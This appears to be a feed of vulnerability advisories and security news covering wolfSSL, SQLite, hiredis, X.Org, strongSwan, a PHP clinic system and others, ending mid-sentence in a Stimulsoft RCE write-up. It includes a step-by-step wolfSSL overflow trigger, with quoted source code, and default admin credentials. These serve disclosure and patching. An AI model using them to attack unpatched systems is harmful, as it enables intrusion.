Delta Electronics InfraSuite Device Master versions 00.00.01a and prior deserialize network packets without proper verification. If the device connects to an attacker-controlled server, the attacker could send maliciously crafted packets that would be deserialized and executed, leading to remote code execution.

CVE-2022-41779

Remote Code Execution in Clinic's Patient Management System v 1.0 allows Attacker to Upload arbitrary php webshell via profile picture upload functionality in users.php

Submitted by oretnom23 on Thursday, June 30, 2022 - 13:09.

****Introduction****

This simple project is a **Clinic Patient Management System**. This is a web-based application project developed in **PHP** and **MySQL Database**. This project's main purpose is to provide an **online and automated** platform for managing data for certain **Medical clinics**. This system helps the clinic to easily store, retrieve, and manage their **patients visiting and prescription records**. It has a pleasant user interface with the help of the **Bootstrap Framework and AdminLTE Template** that provides a better experience to the end-users. It also consists of multiple user-friendly features and functionalities.

****About the Clinic Patient Management System****

The project was developed with the following:

*   **XAMPP v3.3.0**
*   **PHP**
*   **MySQL Database**
*   **HTML**
*   **CSS**
*   **JavaScript**
*   **Ajax**
*   **jQuery**
*   **Bootstrap**
*   **Font Awesome**
*   **AdminLTE**

This **Clinic Patient Management System** is only accessible to the **clinic's management**. It requires the system users to log in with their valid credentials in order to gain access to the features and functionalities of the system. System users can manage the list of **Medicines**, **Medicine Details**, **Patients**, and **Patient Prescriptions**. Here the management can store the patients' visit information with some relevant data such as the blood pressure, weight, disease, and more. The management can create a prescription for the patient for its specific illness or based on her diagnosis. Using the system, the clinic's management can easily retrieve the patient history with the clinic. It also generates a printable and downloadable PDF Report for **Patients Visits Records** and **Diseases Records**.

****Features****

*   **Dashboard Page**
    *   Display the summary.
*   **Medicine Management**
    *   Add New Medicine
    *   List All Medicines
    *   Edit/Update Medicine Details
*   **Medicine Details Management**
    *   Add New Medicine Details
    *   List All Medicine Details
    *   Edit/Update Medicine Details Details
*   **Patient Management**
    *   Add New Patient
    *   List All Patients
    *   Edit/Update Patient Details
    *   Add New Patient's Prescription
    *   Patient's History List
*   **Report**
    *   Generating Printable and Downloadable Reports
        *   Patient Visits
        *   Disease Records
*   **User Management**
    *   Add New User
    *   List All Users
    *   Edit User Details
*   **Login and Logout**

The source code was developed only for educational purposes only. You can download the source code for free and modify it the way you wanted.

**System Snapshots of some Features******Login****

****Dashboard****

****Medicine Details List Page****

****Patient List Page****

****Patient Visits Report****

****Disease Record Report****

**How to Run ??**

****Requirements****

*   **Download** and **Install** any **local web server** such as **XAMPP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)

****System Installation/Setup****

1.  **Open** your **XAMPP Control Panel** and start ****Apache**** and ****MySQL****.
2.  **Extract** the **downloaded source code **zip** file**.
3.  **Copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**.
4.  **Browse** the ****PHPMyAdmin**** in a **browser**. i.e. ****http://localhost/phpmyadmin****
5.  **Create** a **new database** naming ****pms\_db****.
6.  **Import** the provided ****SQL**** file. The file is known as ****pms\_db.sql**** located inside the **database** folder.
7.  **Browse** the **Clinic Patient Management System** in a **browser**. i.e. ****http://localhost/pms/****.

****Admin Default Access:****

Username: **admin**  
Password: **admin123**

****DEMO VIDEO****

That's it. You can now explore the features and functionalities of this **Clinic Patient Management System** in **PHP**. I hope this will help you with what you are looking for and you'll find something useful for your future projects.

Explore more on this website for more **Free Source Codes** and **Tutorials**.

**Enjoy :)**

*   6445 views

CVE-2022-40471: Clinic's Patient Management System in PHP/PDO Free Source Code

The LearnPress WordPress plugin before 4.1.7.2 unserialises user input in a REST API endpoint available to unauthenticated users, which could lead to PHP Object Injection when a suitable gadget is present, leadint to remote code execution (RCE). To successfully exploit this vulnerability attackers must have knowledge of the site secrets, allowing them to generate a valid hash via the wp_hash() function.

CVE-2022-3360

Dormant 32 bit-era coding flaw causes problems for 64-bit systems

Dormant 32 bit-era coding flaw causes problems for 64-bit systems

The maintainers of the SQLite database engine have patched a high severity vulnerability that attackers could exploit to crash or control programs that rely on the software.

Developers of the software have offered The Daily Swig a convincing argument that the flaw would be difficult to exploit in practice. Even so, they have revised the software with a patch to defend against the flaw – rather than dismissing the issue as something that can be safely ignored.

SQLite is a popular open source C-language library that underpins many enterprise apps and services. Notable users of SQLite include Apple, Adobe, Google, Facebook, and Microsoft. There are billions of copies of SQLite deployed worldwide.

The SQLite team is quick to fix emerging vulnerabilities in the software due to their potentially wide-reaching impact. However, a vulnerability disclosed this month by Trail of Bits was introduced 22 years ago and highlighted how initially secure functionality could have unintended consequences much further down the line.

Catch up with the latest database-related security news and analysis

In a blog post dated October 25, Trail of Bits researcher Andreas Kellas said the vulnerability was introduced in SQLite version 1.0.12, a 2000 release that landed when the software was primarily based on 32-bit architectures. According to Kellas, the bug “may not have seemed like an error” at the time.

The high severity vulnerability is tracked as CVE-2022-35737, scoring a CVSS severity score of 7.5.

Trail of Bits said the bug impacts any app that relies on the SQLite library API.

The vulnerability is exploitable on 64-bit systems when large string inputs contain %Q, %q, or %w format substitution types that – in this scenario – might cause programs to crash or worse.

In the most severe cases – when the ! special character exists in the format string – it may be “possible to achieve arbitrary code execution, in the worst case, or to cause the program to hang and loop (nearly) indefinitely,” according to the researchers.

**Root cause analysis**

Speaking to The Daily Swig, the creator of SQLite, D. Richard Hipp, said the root cause of the problem was the use of signed 32-bit integers as a byte index into the input string and to compute the size of the output string. When an input string was large enough, the integer would overflow, and “all kinds of problems” ensued.

However, the potential impact of the flaw appears to be limited.

Hipp told us that it is not possible to reach the vulnerability for malicious purposes via SQL inputs or by passing SQLite a malformed database file. Instead, an attacker would have to abuse the use the sqlite3\_mprintf() function – or “similar C-level interfaces with a format string that includes one of the non-standard \[;...\] conversion symbols, and then pass in a string that is over 2GB in size”.

The software developer added:

“Lots of applications use SQLite, but only a small percentage of those use the sqlite3\_mprintf() API, and an even smaller percentage make use of %Q, %q, or %w. Of those that do, most do not provide a way for an attacker to arrange for a 2GB+ string to be passed into the argument to %Q, %q, or %w.”

**Unearthing Fossil**

In addition, while the project uses the Fossil control system and this software uses printf, the team couldn’t find a way to inject a 2GB string.

CVE-2022-35737 was reported to the Computer Emergency Response Team (CERT) Coordination Center by Trail of Bits on July 14. CERT confirmed the issue, reached out to SQLite maintainers, and the team fixed the bug in the software’s source code only three days later – a task accomplished by converting to the use of 64-bit integers.

The patched SQLite version, v3.39.2, was released on July 21.

“We are grateful for the responsible disclosure from the researchers who found it,” Hipp said. “It doesn’t hurt to upgrade to a newer release of SQLite. But very few if any real-world applications should be affected by this.”

The Daily Swig has reached out to Trail of Bits with additional queries and we will update this story as and when we hear back.

RELATED HyperSQL DataBase flaw leaves library vulnerable to RCE

SQLite patches 22-year-old code execution, denial of service vulnerability

Gentoo Linux Security Advisory 202210-32 - An integer overflow has been found in hiredis which could result in arbitrary code execution. Versions less than 1.0.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202210-32  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: hiredis, hiredis-py: Multiple Vulnerabilities  
     Date: October 31, 2022  
     Bugs: #873079, #816318  
       ID: 202210-32

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

An integer overflow has been found in hiredis which could result in  
arbitrary code execution.

Background  
==========

hiredis is a minimalistic C client library for the Redis database.

hiredis-py is a Python extension that wraps hiredis.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  dev-libs/hiredis           < 1.0.1                      >= 1.0.1  
  2  dev-python/hiredis         < 2.0.0                      >= 2.0.0

Description  
===========

Hiredis is vulnerable to integer overflow if provided maliciously  
crafted or corrupted `RESP` `mult-bulk` protocol data. When parsing  
`multi-bulk` (array-like) replies, hiredis fails to check if `count *  
sizeof(redisReply*)` can be represented in `SIZE_MAX`. If it can not,  
and the `calloc()` call doesn't itself make this check, it would result  
in a short allocation and subsequent buffer overflow.

Impact  
======

Malicious Redis commands could result in remote code execution.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All hiredis users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-libs/hiredis-1.0.1"

All hiredis-py users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-python/hiredis-2.0.0"

References  
==========

[ 1 ] CVE-2021-32765  
      https://nvd.nist.gov/vuln/detail/CVE-2021-32765

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202210-32

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202210-32

Gentoo Linux Security Advisory 202210-30 - Multiple vulnerabilities have been discovered in the Xorg Server and XWayland, the worst of which can result in remote code execution. Versions less than 21.1.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202210-30  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: X.Org X server, XWayland: Multiple Vulnerabilities  
     Date: October 31, 2022  
     Bugs: #857780  
       ID: 202210-30

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in the Xorg Server and  
XWayland, the worst of which can result in remote code execution.

Background  
==========

The X Window System is a graphical windowing system based on a  
client/server model.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  x11-base/xorg-server       < 21.1.4                    >= 21.1.4  
  2  x11-base/xwayland          < 22.1.3                    >= 22.1.3

Description  
===========

Multiple vulnerabilities have been discovered in X.Org X server and  
XWayland. Please review the CVE identifiers referenced below for  
details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All X.Org X server users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=x11-base/xorg-server-21.1.4"

All XWayland users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=x11-base/xwayland-22.1.3"

References  
==========

[ 1 ] CVE-2022-2319  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2319  
[ 2 ] CVE-2022-2320  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2320

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202210-30

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202210-30

In wolfSSL versions prior to 5.5.1, malicious clients can cause a buffer overflow during a resumed TLS 1.3 handshake. If an attacker resumes a previous TLS session by sending a maliciously crafted Client Hello, followed by another maliciously crafted Client Hello. In total 2 Client Hellos have to be sent. One which pretends to resume a previous session and a second one as a response to a Hello Retry Request message.

# wolfssl before 5.5.1: CVE-2022-39173 Buffer overflow when refining  
cipher suites  
==================================================================================

## INFO  
=======

The CVE project has assigned the id CVE-2022-39173 to this issue.

Severity: high 7.5  
Affected version: before 5.5.1  
End of embargo: The embargo for this vulnerability ended 29th of September, 2022

## SUMMARY  
==========

In wolfSSL before 5.5.1 malicious clients can cause a buffer-overflow  
during a resumed TLS 1.3 handshake. If an attacker resumes a previous  
TLS session by sending a maliciously crafted Client Hello, followed by  
another maliciously crafted Client Hello. In total 2 Client Hellos  
have to be sent. One which pretends to resume a previous session and a  
second one as a response to a Hello Retry Request message.

The malicious Client Hellos contain a list of supported cipher suites,  
which contain at least `⌊sqrt(150)⌋ + 1 = 13` duplicates and less than  
150 ciphers in total. The buffer-overflow occurs in the `RefineSuites`  
function. An overflow of 44700 bytes has been confirmed. Therefore,  
large portions of the stack can get overwritten, including return  
addresses.

We confirmed the vulnerability by sending packets over TCP to a  
Wolfssl server, freshly built from the sources with the  
`--enable-session-ticket` flags (or simply `--enable-all`). We can  
provide sources for our software (tlspuffin) that produce those  
packets (and that automatically found the attack trace). The command  
given at the end of this document triggers the buffer overflow.

It is very likely that there is a way to craft an exploit which can  
cause a RCE. We have not yet created such an exploit as it would  
likely depend on the memory layout of the binary which uses wolfSSL.

Moreover, the size of the overflow can be fine-tuned in order to not  
smash the stack and continue the execution with a too large length of  
suites buffer and that will cause other routines that iterate over  
thus buffer (e.g., `FindSuiteSSL`) to misbehave. Hypothetically, this  
might be exploited to make the server use a cipher it should not  
accept such as `nullcipher` that would open up new attack vectors such  
as downgrade attacks.  
While this has not been confirmed yet, the buffer overflow itself has  
been confirmed.

## DETAILS  
==========

Line numbers below are valid for the wolfSSL Git tag  
[v5.4.0-stable](https://github.com/wolfSSL/wolfssl/tree/v5.4.0-stable).

The bug we found is in the `RefineSuites` function. In the following  
we want to explain why the function is able to overflow the `suites`  
array.  
```c  
/* Refine list of supported cipher suites to those common to server and client.  
 *  
 * ssl         SSL/TLS object.  
 * peerSuites  The peer's advertised list of supported cipher suites.  
 */  
static void RefineSuites(WOLFSSL* ssl, Suites* peerSuites)  
{  
    byte   suites[WOLFSSL_MAX_SUITE_SZ];  
    word16 suiteSz = 0;  
    word16 i, j;

    XMEMSET(suites, 0, WOLFSSL_MAX_SUITE_SZ);

    for (i = 0; i < ssl->suites->suiteSz; i += 2) {  
        for (j = 0; j < peerSuites->suiteSz; j += 2) {  
            if (ssl->suites->suites[i+0] == peerSuites->suites[j+0] &&  
                ssl->suites->suites[i+1] == peerSuites->suites[j+1]) {  
                suites[suiteSz++] = peerSuites->suites[j+0];  
                suites[suiteSz++] = peerSuites->suites[j+1];  
            }  
        }  
    }

    ssl->suites->suiteSz = suiteSz;  
    XMEMCPY(ssl->suites->suites, &suites, sizeof(suites));  
#ifdef WOLFSSL_DEBUG_TLS  
    [...]  
#endif  
}  
```  
tls13.c:4355

The `RefineSuites` function expects a `WOLFSSL` struct which contains  
a list of acceptable ciphers suites (`ssl->suites->suites`), as well  
as an array of peer cipher suites (`peerSuites`). Both inputs are  
bounded by `WOLFSSL_MAX_SUITE_SZ`, which is equal to 300 bytes or 150  
cipher suites.

Let us assume that `ssl->suites` consists of a single cipher suite  
like `TLS_AES_256_GCM_SHA384` and the `peerSuites` list contains the  
same cipher repeated thirteen times. The `RefineSuites` function will  
iterate for each element in `ssl->suites` over `peerSuites` and append  
the suite to `suites` if it is a match. The `suites` array has a  
maximum length of `WOLFSSL_MAX_SUITE_SZ == 300 bytes == 150 suites`.

With the just mentioned example input, the length of `suites` will now  
equal thirteen. The `suites` array is now copied to the `WOLFSSL`  
struct in the last line of the listing above. Therefore, `ssl->suites`  
contains now thirteen times the `TLS_AES_256_GCM_SHA384` cipher suite.

Let us now call the same `RefineSuites` function again on the modified  
`WOLFSSL` struct and the same `peerSuites` list. The `RefineSuites`  
function will iterate for each element in `ssl->suites` over  
`peerSuites` and append the suite to `suites` if it is a match.  
Because `ssl->suites` contains already 13 times the  
`TLS_AES_256_GCM_SHA384` cipher suite, in total 13 x 13 = 169 cipher  
suites are written to `suites`. 169 cipher suites require 338 bytes,  
which is more than what's available on the stack. The `suites` buffer  
overflows.

The maximum size of `peerSuites` is 150 cipher suites. Therefore, an  
overflow of 44700 bytes is possible and has been confirmed.

The buffer `ssl->suites->suites` is supposed to be reset to only  
contain the acceptable ciphers at each session start, and thus  
initially contains no duplicate. However, by provoking a `HELLO CLIENT  
RETRY REQUEST`, it is possible to make the server call `RefineSuites`  
twice as explained next.

## TRIGGERING THE BUFFER OVERFLOW  
=================================

In order to cause the above buffer-overflow, it is required to call  
`RefineSuites` twice. Malicious clients need to perform the handshake  
in a certain way to reach this situation.  
The buffer overflow at the attacked server can be obtained at least in  
the following situation:

1. Resume the previous session by sending a second Client Hello  
(`CH2`) with the following criteria:  
   - Exclude the `support_group_extension`, to cause a Hello Retry Request  
   - Include a binder which cryptographically binds this session to  
the previous one.  
   - Include a list of cipher suites that contains a repetition of `n`  
times the same cipher `c` with `13 <= n < 150`, deemed acceptable by  
the server.

   The server will parse this message, enters the state  
`SERVER_HELLO_RETRY_REQUEST_COMPLETE` and stores at least `n` times  
the cipher `c` in `ssl->suites->suites` by calling `RefineSuites`.

2. Sending a third Client Hello (`CH3`) with the same criteria as in step 2.  
   The server will parse this message and because  
`ssl->suites->suites` already contains `n` times the cipher `c`,  
`RefineSuites` will write in `suites` at least until `suites[nˆ2]`  
which overflows since `nˆ2 > 300`.

## DETAILS ABOUT STEP 1.  
========================

During step 2., we want to cause the server to perform a Hello Retry Request.

This is possible by not sending a supported group in the `CH2`. By not  
sending a support group extension, the function  
`TLSX_SupportedGroups_Find` will return false.

```c  
static int TLSX_SupportedGroups_Find(WOLFSSL* ssl, word16 name)  
{  
    ...  
        /* Check consistency now - extensions in any order. */  
        if (!TLSX_SupportedGroups_Find(ssl, clientKSE->group))  
            continue;  
    ...  
```  
tls.c:8374

This will cause clientKSE to be `NULL` and `doHelloRetry` will be set to 1.

```c  
int TLSX_KeyShare_Establish(WOLFSSL *ssl, int* doHelloRetry)  
{  
    ...  
    /* No supported group found - send HelloRetryRequest. */  
    if (clientKSE == NULL) {  
        /* Set KEY_SHARE_ERROR to indicate HelloRetryRequest required. */  
        *doHelloRetry = 1;  
        return TLSX_KeyShare_SetSupported(ssl);  
    }  
    ...  
```  
tls.c:9273

Finally, the server enters the state  
`SERVER_HELLO_RETRY_REQUEST_COMPLETE` in the function  
`VerifyServerSuite` while verifying the server suite when processing  
`CH2`.

```c  
    /* Make sure server cert/key are valid for this suite, true on success  
     * Returns 1 for valid server suite or 0 if not found  
     * For asynchronous this can return WC_PENDING_E  
     */  
    static int VerifyServerSuite(WOLFSSL* ssl, word16 idx)  
    {  
        ...  
        if (IsAtLeastTLSv1_3(ssl->version) &&  
                                      ssl->options.side == WOLFSSL_SERVER_END) {  
            int doHelloRetry = 0;  
            /* Try to establish a key share. */  
            int ret = TLSX_KeyShare_Establish(ssl, &doHelloRetry);  
            if (doHelloRetry) {  
                ssl->options.serverState = SERVER_HELLO_RETRY_REQUEST_COMPLETE;  
            }

            ...  
        }  
        ...  
```  
tls.c:30688

## DETAILS ABOUT STEP 2.  
====================

The server is now in a state in which it expects another Client Hello  
(`CH3`) from the client.

The server is now in the state `SERVER_HELLO_RETRY_REQUEST_COMPLETE`  
and will process the third ClientHello (`CH3`) with the call of  
`ProcessReply` before reaching the `TLS13_ACCEPT_SECOND_REPLY_DONE`  
state.

```c  
int wolfSSL_accept_TLSv13(WOLFSSL* ssl)  
{  
    ...  
        case TLS13_ACCEPT_FIRST_REPLY_DONE :  
            if (ssl->options.serverState ==  
                                          SERVER_HELLO_RETRY_REQUEST_COMPLETE) {  
                ssl->options.clientState = CLIENT_HELLO_RETRY;  
                while (ssl->options.clientState < CLIENT_HELLO_COMPLETE) {  
                    if ((ssl->error = ProcessReply(ssl)) < 0) {  
                        WOLFSSL_ERROR(ssl->error);  
                        return WOLFSSL_FATAL_ERROR;  
                    }  
                }  
            }

            ssl->options.acceptState = TLS13_ACCEPT_SECOND_REPLY_DONE;  
            WOLFSSL_MSG("accept state ACCEPT_SECOND_REPLY_DONE");  
            FALL_THROUGH;  
    ...  
```  
tls13.c:10909

## VULNERABILITY VARIANTS  
=========================

### Adjusting the overflow  
Note that the length of the list of ciphers in `CH2` does not  
necessarily have to be the same as the one of `CH1` and can be  
adjusted to fine-tune the size of the overflow.

### Make the server parse `CH2`  
Note also that, on the contrary to `CH1`, `CH2` does not necessarily  
have to put the server in the `SERVER_HELLO_RETRY_REQUEST_COMPLETE`  
state (which should be forbidden by the TLS 1.3 RFC) or make it return  
an error, and can thus contain a supported group, which could be  
included to possibly make the server continue the processing of `CH2`  
without returning an error.  
We have confirmed that we can make the server parses `CH2` until the  
end and starts computing a Server Hello with `ssl->suites->suiteSz`  
that exceeds 300.

### Resuming an existent session  
It is also possible to trigger the vulnerability by trying to resume  
an existent and genuine session established through a full initial  
handshake (step 0.):  
0. Sending an initial genuine Client Hello (`CH1`) to the server and  
then completing a full handshake, thus establishing a PSK.

## EXPLOITATION  
===============

We suspect that it is possible to craft an exploit which could lead to  
RCE if any of the above bytes coincides with the memory address of  
executable code. Depending on the memory layout of the binary it could  
be possible to gain RCE.  
More bytes could be used to overflow `suites` if more ciphers were  
configured to be accepted with the server, e.g., with options like  
`--enable-blake2`.

We confirmed that this could also be exploited to smash the stack and  
cause the server to crash with a segmentation fault by using a large  
list of ciphers.

Finally, by fine-tuning the length of the overflow and by including  
the supported group in `CH3`, it could be possible to make the server  
process `CH3` with a `ssl->suites->suites->suiteSz` value that exceeds  
300. This way, routines like `FindSuiteSSL` that will iterate over  
`ssl->suites->suites` (allocated on 300 bytes) until  
`ssl->suites->suiteSz` (>300) will also iterate over bytes that  
contain other fields such as `ssl->suites->hashSigAlgo`. It is likely  
that this could be exploited to make such routines return arbitrary  
values. For example, it might be exploited to make the server use a  
cipher it should not accept such as `nullcipher`; thus breaking  
confidentiality.

## FURTHER CONCERNS  
==================

We observed that the server is accepting the `CH2` Client Hello  
message and issues a Hello Retry Request, even though `CH2` does not  
contain supported groups. Clients are not allowed to add the supported  
groups extension in the retry Client Hello (`CH3`) according to the  
RFC 8446 in section  
[4.1.2](https://www.rfc-editor.org/rfc/rfc8446#section-4.1.2). The  
addition of supported groups is not allowed when retrying the Client  
Hello.  
We suggest aborting the handshake when receiving `CH2` instead of  
offering the client a retry.

wolfSSL Buffer Overflow

Plus: Important patches from Apple, VMWare, Cisco, Zimbra, SAP, and Oracle.

Other issues fixed in October are a heap buffer overflow in WebSQL tracked as CVE-2022-3446 and a use-after-free bug in Permissions API tracked as CVE-2022-3448, Google wrote in its blog. Google also fixed two use-after-free bugs in Safe Browsing and in Peer Connection.

Google Android

The Android Security Bulletin for October includes fixes for 15 flaws in the Framework and System and 33 issues in the kernel and vendor components. One of the most concerning issues is a critical security vulnerability in the Framework component that could lead to local escalation of privilege, tracked as CVE-2022-20419. Meanwhile, a flaw in the Kernel could also lead to local escalation of privilege with no additional execution privileges needed.

None of the issues are known to have been used in attacks, but it still makes sense to check your device and update it when you can. Google has issued the update to its Pixel devices and it’s also available for the Samsung Galaxy S21 and S22 series smartphones and Galaxy S21 FE.

Cisco

Cisco has urged companies to patch two flaws in its AnyConnect Secure Mobility Client for Windows after it was confirmed the vulnerabilities are being used in attacks. Tracked as CVE-2020-3433, the first could allow an attacker with valid credentials on Windows to execute code on the affected machine with system privileges.

Meanwhile, CVE-2020-3153 could allow an attacker with valid Windows credentials to copy malicious files to arbitrary locations with system-level privileges.

The US Cybersecurity and Infrastructure Security Agency has added the Cisco flaws to its already exploited vulnerabilities catalog.

While both the Cisco flaws require the attacker to be authenticated, it’s still important to update now.

Zoom

Video conferencing service Zoom patched several issues in October, including a flaw in its Zoom client for meetings, which is marked as having a high severity with a CVSS Score of 8.8. Zoom says versions before version 5.12.2 are susceptible to a URL-parsing vulnerability tracked as CVE-2022-28763.

“If a malicious Zoom meeting URL is opened, the link may direct the user to connect to an arbitrary network address, leading to additional attacks including session takeovers,” Zoom said in a security bulletin.

Earlier in the month, Zoom alerted users that its client for meetings for macOS starting with 5.10.6 and prior to 5.12.0 contained a debugging port misconfiguration.

VMWare

Software giant VMWare has patched a serious vulnerability in its Cloud Foundation

Tracked as CVE-2021-39144. The remote code execution vulnerability via XStream open source library is rated as having a critical severity with a maximum CVSSv3 base score of 9.8. “Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation, a malicious actor can get remote code execution in the context of 'root' on the appliance,” VMWare said in an advisory.

The VMware Cloud Foundation update also addresses an XML External Entity vulnerability with a lesser CVSSv3 base score of 5.3. Tracked as CVE-2022-31678, the bug could allow an unauthenticated user to perform denial of service.

Zimbra

Software firm Zimbra has issued patches to fix an already-exploited code execution flaw that could allow an attacker to access user accounts. The issue, tracked as CVE-2022-41352, has a CVSS severity score of 9.8.

Exploitation was spotted by Rapid7 researchers, who identified signs it had been used in attacks. Zimbra initially released a workaround to fix it, but now the patch is available, you should apply it ASAP.

SAP

Enterprise software firm SAP has published 23 new and updated Security Notes in its October Patch Day. Among the most serious issues is a critical Path Traversal vulnerability in SAP Manufacturing Execution. The vulnerability affects two plugins: Work Instruction Viewer and Visual Test and Repair and has a CVSS score of 9.9.

Another issue with a CVSS score of 9.6 is an account hijacking vulnerability in the SAP Commerce login page.

Oracle

Software giant Oracle has released a whopping 370 patches as part of its quarterly security update. Oracle’s Critical Patch Update for October fixes 50 vulnerabilities rated as critical.

The update contains 37 new security patches for Oracle MySQL, 11 of which may be remotely exploitable without authentication. It also contains 24 new security patches for Oracle Financial Services Applications, 16 of which may be remotely exploitable without authentication.

Due to “the threat posed by a successful attack,” Oracle “strongly recommends” that customers apply Critical Patch Update security patches as soon as possible.

You Need to Update Google Chrome, Windows, and Zoom Right Now

strongSwan before 5.9.8 allows remote attackers to cause a denial of service in the revocation plugin by sending a crafted end-entity (and intermediate CA) certificate that contains a CRL/OCSP URL that points to a server (under the attacker's control) that doesn't properly respond but (for example) just does nothing after the initial TCP handshake, or sends an excessive amount of application data.

A vulnerability related to online certificate revocation checking was discovered in strongSwan that can lead to a denial-of-service attack. All versions may be affected.

Lahav Schlesinger reported a bug related to online certificate revocation checking that can lead to a denial-of-service attack.

**Using Untrusted URIs for Revocation Checking**

Because the _revocation_ plugin uses potentially untrusted OCSP URIs and CRL distribution points (CDP) in certificates, a remote attacker is able to initiate IKE\_SAs and send crafted certificates that contain URIs pointing to servers under their control, which can lead to a denial-of-service attack.  Affected are all strongSwan versions if they use the _revocation_ plugin or a custom plugin that implements similar features.

CVE-2022-40617 has been assigned for this vulnerability.

**Problematic Inline Revocation Checking in Trust Chain Validation**

strongSwan's credential manager component, which is responsible for verifying trust chains, always did online certificate revocation checks inline while traversing the certificate chain.  That is, for each certificate, starting with the end-entity certificate, it searches a matching issuer certificate and if the signature and lifetimes are valid, calls plugins via the cert_validator_t interface to do extended validation of the current certificate.  One of these plugins is the _revocation_ plugin that uses OCSP URIs and CDPs in the issued certificate to check its status (e.g. whether it was revoked by the issuing CA).

While this approach allows to immediately abort the validation if a revoked certificate is encountered, the problem is that the certificate chain might not yet be trusted when the revocation plugin accesses the contained URIs. Only for a single-level PKI is the trust immediately established when finding the trusted, self-signed CA certificate that issued the end-entity certificate. So if an attacker sends specifically crafted end-entity and intermediate CA certificates, the URIs in the end-entity certificate are used for online revocation checks before the intermediate CA certificate is later rejected because no trusted issuer certificate is found and the authentication fails.

This allows attackers to encode URIs to servers under their control and force a strongSwan instance to connect to them.

**Denial-of-Service Due To Attacker-Controlled OCSP URIs and CDPs**

As described above, attackers are able force the _revocation_ plugin to make requests to arbitrary servers. This can lead to different kinds of denial-of-service attacks, depending on how these servers react.

A first one can be caused via a server that lets clients complete the TCP three-way handshake but then sends no data. It has to be reachable as there is an initial connection timeout (for DNS resolution and TCP handshake completion). But because the _revocation_ plugin doesn't set an overall timeout for its requests and some fetcher plugins don't use one by default, in particular the commonly used _curl_ plugin, the worker thread will be blocked practically indefinitely (i.e. until the default TCP timeout of the underling TCP/IP stack). By initiating multiple IKE\_SAs with the same certificates, attackers are able to block worker threads to the point the daemon will not be able to process any further IKE messages or other events.

In a second potential attack, instead of sending no data, the server sends a lot of it. Because the fetched OCSP/CRL data is stored in memory and without any upper limits, the attacker might be able to exhaust all memory of the host strongSwan runs on, or at least force a system like Linux's OOM killer to terminate the IKE daemon.

Remote code execution is not possible due to this issue.

As mentioned in the introduction, credit to Lahav Schlesinger for finding this vulnerability.

**Mitigation**

Setups that don't use the _revocation_ plugin are not directly vulnerable. However, if custom plugins are loaded that implement the validate() method of the cert_validator_t interface, there could be similar problems due to the inline certificate validation described above.

The just released strongSwan 5.9.8 fixes this vulnerability by creating a trusted certificate chain before starting online revocation checks. For older releases, we provide a patch that fixes the vulnerability and should apply with appropriate hunk offsets (please note that we don't provide patches for versions < 5.1.0).

CVE-2022-40617: strongSwan Vulnerability (CVE-2022-40617)

Stimulsoft (aka Stimulsoft Reports) 2013.1.1600.0, when Compilation Mode is used, allows an attacker to execute arbitrary C# code on any machine that renders a report, including the application server or a user's local machine, as demonstrated by System.Diagnostics.Process.Start.

Similar to CVE-2020-15865. However, this one was a little trickier because I could only execute chained C# commands that ultimately return an Object. This is a technique that can be used anywhere where user input is compiled by design, such as in template injection. In fact, hackers I've shared this story with had success using the concept across different languages and systems.

**Information Disclosure to RCE** 

This started with a low severity issue - a verbose error message from the application when I typed SQL junk into the Report Editor, looking for a SQL injection. The errors contained CS1503 (C# compilation errors) returned from Stimulsoft Reports 2013.1.1600.0, so I was confident there was an RCE available: 

So, after trying a few C# commands, I eventually I got errors like:

